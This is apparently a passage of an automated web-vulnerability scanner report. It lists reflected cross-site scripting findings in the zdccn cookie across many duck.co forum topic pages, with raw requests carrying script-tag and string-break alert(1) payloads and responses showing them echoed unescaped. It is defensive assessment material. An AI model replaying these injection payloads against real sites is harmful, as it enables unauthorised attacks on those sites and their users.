GET /topic/foss-donation-nominations HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295434fb02"><script>alert(1)</script>147268482d4;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=EA5439E12DFAFAFEEAFEBEB0796662DE; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:57 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295434fb02"><script>alert(1)</script>147268482d4"/>
...[SNIP]...

3.274. http://duck.co/topic/foss-donation-nominations [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/foss-donation-nominations

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/foss-donation-nominations HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543f0e11"-alert(1)-"a6ecdfc1224;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=742FCC69AB14CF7EB2A04E66DA0F5091; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:15 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc729543f0e11"-alert(1)-"a6ecdfc1224";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.275. http://duck.co/topic/freenet [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/freenet

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/freenet HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954350551"-alert(1)-"0e4547e582;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=048AB0515D662D8247FB49F255F1C897; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:06 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954350551"-alert(1)-"0e4547e582";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.276. http://duck.co/topic/freenet [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/freenet

Request

GET /topic/freenet HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295437fe46"><script>alert(1)</script>ed67880afca;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E05E6BDC0E2B01FA01CD2FFF82F65DFE; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:53 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295437fe46"><script>alert(1)</script>ed67880afca"/>
...[SNIP]...

3.277. http://duck.co/topic/historical-traffic-stats [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/historical-traffic-stats

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/historical-traffic-stats HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543505a2"-alert(1)-"1a876969b40;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BBA91488DB83F1EEE64851FC34C430FF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:26 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc729543505a2"-alert(1)-"1a876969b40";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.278. http://duck.co/topic/historical-traffic-stats [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/historical-traffic-stats

Request

GET /topic/historical-traffic-stats HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295438cd59"><script>alert(1)</script>ab4da75d1e2;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0258987546EEAC719E523CABD6B3ABC5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:16 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295438cd59"><script>alert(1)</script>ab4da75d1e2"/>
...[SNIP]...

3.279. http://duck.co/topic/how-to-get-similar-growth-for-2011 [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/how-to-get-similar-growth-for-2011

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/how-to-get-similar-growth-for-2011 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543916e0"-alert(1)-"e46fbd610d4;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E32B61ACAD02343CE4A5BF9EEBFC5B20; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:43 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc729543916e0"-alert(1)-"e46fbd610d4";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.280. http://duck.co/topic/how-to-get-similar-growth-for-2011 [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/how-to-get-similar-growth-for-2011

Request

GET /topic/how-to-get-similar-growth-for-2011 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543a9bde"><script>alert(1)</script>e3a581a4723;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B6FE95797EAE8B42A63B12057C5A91A5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:30 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc729543a9bde"><script>alert(1)</script>e3a581a4723"/>
...[SNIP]...

3.281. http://duck.co/topic/i-did-my-own-way-to-promote-ddg [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/i-did-my-own-way-to-promote-ddg

Request

GET /topic/i-did-my-own-way-to-promote-ddg HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543721a0"><script>alert(1)</script>61cae442f0f;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=A020435CC07707A105750F7674133A46; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:53 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc729543721a0"><script>alert(1)</script>61cae442f0f"/>
...[SNIP]...

3.282. http://duck.co/topic/i-did-my-own-way-to-promote-ddg [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/i-did-my-own-way-to-promote-ddg

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/i-did-my-own-way-to-promote-ddg HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954370147"-alert(1)-"ab3d98aaf1a;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=ABB4EE62C0A293F916AED6832072A8B4; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:06 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954370147"-alert(1)-"ab3d98aaf1a";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.283. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/i-would-love-it-iff-i-need-ideas-fast-please-click

Request

GET /topic/i-would-love-it-iff-i-need-ideas-fast-please-click HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954382916"><script>alert(1)</script>ad62bc60074;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=3BDD2471833D18517D2F9D9648A5DBF7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:09 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc72954382916"><script>alert(1)</script>ad62bc60074"/>
...[SNIP]...

3.284. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/i-would-love-it-iff-i-need-ideas-fast-please-click

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/i-would-love-it-iff-i-need-ideas-fast-please-click HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954341071"-alert(1)-"89d10fe077d;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=3BBE62F77B05DF801E264CAB59660C71; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:19 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954341071"-alert(1)-"89d10fe077d";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.285. http://duck.co/topic/logging-in-message-email-not-confirmed [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/logging-in-message-email-not-confirmed

Request

GET /topic/logging-in-message-email-not-confirmed HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543eca31"><script>alert(1)</script>c70d1ce71fa;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=72449426A4DAACD66CD8A9F280B0616F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:05 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc729543eca31"><script>alert(1)</script>c70d1ce71fa"/>
...[SNIP]...

3.286. http://duck.co/topic/logging-in-message-email-not-confirmed [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/logging-in-message-email-not-confirmed

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/logging-in-message-email-not-confirmed HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295438e909"-alert(1)-"c79c300f7d3;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=EB8CEA6D488B65A9C1ED208863EA0664; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:16 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc7295438e909"-alert(1)-"c79c300f7d3";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.287. http://duck.co/topic/maps [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/maps

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/maps HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954329eb8"-alert(1)-"42e9ca695e7;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=AFBFEF4643BFDB0A6564692A339B8BB1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:36 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954329eb8"-alert(1)-"42e9ca695e7";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.288. http://duck.co/topic/maps [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/maps

Request

GET /topic/maps HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295436e225"><script>alert(1)</script>ac6863c7d88;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0BE2268E5D4A98F9B2753DC7F923D4C0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:23 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295436e225"><script>alert(1)</script>ac6863c7d88"/>
...[SNIP]...

3.289. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/opera-thread-include-duckduckgo-in-default-search-engines

Request

GET /topic/opera-thread-include-duckduckgo-in-default-search-engines HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543c9e69"><script>alert(1)</script>6c648222f6e;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D010DA0764900A3400E042BF488355FC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:05 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc729543c9e69"><script>alert(1)</script>6c648222f6e"/>
...[SNIP]...

3.290. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/opera-thread-include-duckduckgo-in-default-search-engines

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/opera-thread-include-duckduckgo-in-default-search-engines HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295435b258"-alert(1)-"cbc384a9e23;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=3710A89860B57DAB1C5D26BB2DD429F1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:13 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc7295435b258"-alert(1)-"cbc384a9e23";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.291. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/pages-without-favicon-uses-ddg-favicon

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/pages-without-favicon-uses-ddg-favicon HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543488ae"-alert(1)-"3da1f543ac2;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=5FA37F35DF5D6C10E73986C298B954F4; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:07 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc729543488ae"-alert(1)-"3da1f543ac2";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.292. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/pages-without-favicon-uses-ddg-favicon

Request

GET /topic/pages-without-favicon-uses-ddg-favicon HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
